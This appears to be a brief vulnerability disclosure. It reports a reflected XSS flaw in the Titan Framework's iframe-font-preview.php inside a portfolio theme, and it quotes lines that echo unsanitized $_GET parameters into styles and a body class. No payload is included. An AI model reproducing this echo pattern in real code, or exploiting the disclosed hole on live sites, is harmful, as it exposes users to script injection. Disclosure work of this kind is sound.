There is a reflected XSS vulnerability in the following php code ./simple-behace-portfolio/titan-framework/iframe-font-preview.php: 99: font-family: <?php echo $_GET['font-family'] ?>; 100: color: <?php echo $_GET['color'] ?>; 101: font-size: <?php echo $_GET['font-size'] ?>; 102: font-weight: <?php echo $_GET['font-weight'] ?>; 103: font-style: <?php echo $_GET['font-style'] ?>; 104: line-height: <?php echo $_GET['line-height'] ?>; 105: letter-spacing: <?php echo $_GET['letter-spacing'] ?>; 106: text-transform: <?php echo $_GET['text-transform'] ?>; 107: font-variant: <?php echo $_GET['font-variant'] ?>; 141: <body class='<?php echo $_GET['dark'] ?>'> The variable font-family appears to send unsanitized data back to the users browser.